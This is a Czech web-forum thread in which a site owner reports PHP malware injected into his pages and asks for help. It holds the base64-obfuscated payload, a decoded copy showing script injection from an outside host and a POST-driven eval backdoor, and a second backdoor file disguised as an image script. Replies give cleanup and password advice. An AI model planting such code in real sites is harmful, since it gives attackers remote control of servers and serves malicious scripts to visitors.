Autor Zpráva
msigmund
Profil
Dobrý den,
prosím vás všechny odborníky o pomoc. Prosím hodně.
Na stránkách se mi přes noc objevil tento kód a stránky nefungovaly.
Stačilo ho smazat, ale co se stalo prosím a dá se tomu předejít.

<?php eval(base64_decode('aWYoIWlzc2V0KCRsYXcxKSl7ZnVuY3Rpb24gbGF3KCRzKXtpZihwcmVnX21hdGNoX2FsbCgnIzxzY3JpcHQoLio/KTwvc
2NyaXB0PiNpcycsJHMsJGEpKWZvcmVhY2goJGFbMF0gYXMgJHYpaWYoY291bnQoZXhwbG9kZSgiXG4iLCR2KSk+NSl7JGU9cHJlZ19tYXRjaCgnI1tcJyJdW
15cc1wnIlwuLDtcPyFcW1xdOi88PlwoXCldezMwLH0jJywkdil8fHByZWdfbWF0Y2goJyNbXChcW10oXHMqXGQrLCl7MjAsfSMnLCR2KTtpZigocHJlZ19tYX
RjaCgnI1xiZXZhbFxiIycsJHYpJiYoJGV8fHN0cnBvcygkdiwnZnJvbUNoYXJDb2RlJykpKXx8KCRlJiZzdHJwb3MoJHYsJ2RvY3VtZW50LndyaXRlJykpKSR
zPXN0cl9yZXBsYWNlKCR2LCcnLCRzKTt9aWYocHJlZ19tYXRjaF9hbGwoJyM8aWZyYW1lIChbXj5dKj8pc3JjPVtcJyJdPyhodHRwOik/Ly8oW14+XSo/KT4j
aXMnLCRzLCRhKSlmb3JlYWNoKCRhWzBdIGFzICR2KWlmKHByZWdfbWF0Y2goJyMgd2lkdGhccyo9XHMqW1wnIl0/MCpbMDFdW1wnIj4gXXxkaXNwbGF5XHMqO
lxzKm5vbmUjaScsJHYpJiYhc3Ryc3RyKCR2LCc/Jy4nPicpKSRzPXByZWdfcmVwbGFjZSgnIycucHJlZ19xdW90ZSgkdiwnIycpLicuKj88L2lmcmFtZT4jaX
MnLCcnLCRzKTskcz1zdHJfcmVwbGFjZSgkYT1iYXNlNjRfZGVjb2RlKCdQSE5qY21sd2RDQnpjbU05YUhSMGNEb3ZMMk50WTJ4MVpHaHBZVzVoTG1sdUwyVjJ
aVzUwWDJsdFlXZGxMMk50WTE5c2RXUm9hV0Z1WVY5b2IzTndhWFJoYkM1d2FIQWdQand2YzJOeWFYQjBQZz09JyksJycsJHMpO2lmKHN0cmlzdHIoJHMsJzxi
b2R5JykpJHM9cHJlZ19yZXBsYWNlKCcjKFxzKjxib2R5KSNtaScsJGEuJ1wxJywkcyk7ZWxzZWlmKHN0cnBvcygkcywnLGEnKSkkcy49JGE7cmV0dXJuICRzO
31mdW5jdGlvbiBsYXcyKCRhLCRiLCRjLCRkKXtnbG9iYWwgJGxhdzE7JHM9YXJyYXkoKTtpZihmdW5jdGlvbl9leGlzdHMoJGxhdzEpKWNhbGxfdXNlcl9mdW
5jKCRsYXcxLCRhLCRiLCRjLCRkKTtmb3JlYWNoKEBvYl9nZXRfc3RhdHVzKDEpIGFzICR2KWlmKCgkYT0kdlsnbmFtZSddKT09J2xhdycpcmV0dXJuO2Vsc2V
pZigkYT09J29iX2d6aGFuZGxlcicpYnJlYWs7ZWxzZSAkc1tdPWFycmF5KCRhPT0nZGVmYXVsdCBvdXRwdXQgaGFuZGxlcic/ZmFsc2U6JGEpO2ZvcigkaT1j
b3VudCgkcyktMTskaT49MDskaS0tKXskc1skaV1bMV09b2JfZ2V0X2NvbnRlbnRzKCk7b2JfZW5kX2NsZWFuKCk7fW9iX3N0YXJ0KCdsYXcnKTtmb3IoJGk9M
DskaTxjb3VudCgkcyk7JGkrKyl7b2Jfc3RhcnQoJHNbJGldWzBdKTtlY2hvICRzWyRpXVsxXTt9fX0kbGF3bD0oKCRhPUBzZXRfZXJyb3JfaGFuZGxlcignbGF
3MicpKSE9J2xhdzInKT8kYTowO2V2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2UnXSkpOw==')); ?>

Děkuji všem.
roberta
Profil
vymaž to a zmeň si ftp heslo.
Alphard
Profil
Máte na webu virus — co s tím?
Joker
Profil
msigmund:
Virus. Viz odkaz od Alpharda.

Pro zajímavost, po dekódování všech base64 a vypadá kód toho viru takhle:
Podstatný je asi hlavně poslední řádek (skript čeká na předání nějakého PHP kódu, který pak vykoná)
if(!isset($law1)){
  function law($s){
    if(preg_match_all('#<script(.*?)</script>#is',$s,$a))
      foreach($a[0] as $v)
        if(count(explode("\n",$v))>5)
        {
          $e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);
          if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))
            $s=str_replace($v,'',$s);
        }
        if(preg_match_all('#<iframe ([^>]*?)src=[\'"]?(http:)?//([^>]*?)>#is',$s,$a))
          foreach($a[0] as $v)
            if(preg_match('# width\s*=\s*[\'"]?0*[01][\'"> ]|display\s*:\s*none#i',$v)&&!strstr($v,'?'.'>'))
              $s=preg_replace('#'.preg_quote($v,'#').'.*?</iframe>#is','',$s);
              
            $s=str_replace($a='<script src=http://cmcludhiana.in/event_image/cmc_ludhiana_hospital.php ></script>'),'',$s);
            if(stristr($s,'<body'))
              $s=preg_replace('#(\s*<body)#mi',$a.'\1',$s);
            elseif(strpos($s,',a'))
              $s.=$a;return $s;
  }
  
  function law2($a,$b,$c,$d)
  {
    global $law1;
    $s=array();
    if(function_exists($law1))
      call_user_func($law1,$a,$b,$c,$d);
    
    foreach(@ob_get_status(1) as $v)
      if(($a=$v['name'])=='law')
        return;
      elseif($a=='ob_gzhandler')
        break;
      else $s[]=array($a=='default output handler'?false:$a);
    
    for($i=count($s)-1;$i>=0;$i--)
    {
      $s[$i][1]=ob_get_contents();
      ob_end_clean();
    }
    ob_start('law');
    for($i=0;$i<count($s);$i++)
    {
      ob_start($s[$i][0]);
      echo $s[$i][1];
    }
  }
}
$lawl=(($a=@set_error_handler('law2'))!='law2') ? $a:0;
eval(base64_decode($_POST['e']));
msigmund
Profil
Právě to čistím a narazil jsem ještě na soubor "gifimg.php" ve složce images a kód je

<?php eval(base64_decode('aWYoaXNzZXQoJF9QT1NUWydlJ10pKWV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2UnXSkpO2Vsc2UgZGllKCc0MDQgTm90IEZvdW5kJyk7'));?>

Jinak to infikovalo všechny soubory "index.php - config.php - db.php" ve všech složkách.
msigmund
Profil
Je to hotové, ale chtěl jsem se ještě zeptat píšou nepoužívat Total Commander, ale já se dočetl na internetu, že verze 7.50a má lepší šifrování hesel tak jí používám. Já píšu v PSPadu a soubory posílám přes TC. Jinde hesla nemám. Co byste mi poradily.


Děkuji všem za velkou pomoc.
Joker
Profil
msigmund:
Co byste mi poradily.
Jestli to tedy není otázka jen pro programátorky a mohou radit i muži, asi nejlepší varianta je nemít uložené heslo a zadávat ho při připojení zvlášť.
Anebo zkusit trik s ukládáním pozměněného hesla (viz odkaz v příspěvku #3)
Bubák
Profil
msigmund:
verze 7.50a má lepší šifrování hesel tak jí používám
A máš šifrování pomocí "hlavního hesla" zapnuto?
msigmund
Profil
Ano ke každému heslu dávám i hlavní heslo.
Je to šifrování bezpečné nebo není.

Vaše odpověď

Mohlo by se hodit

Odkud se sem odkazuje


Prosím používejte diakritiku a interpunkci.

Ochrana proti spamu. Napište prosím číslo dvě-sta čtyřicet-sedm: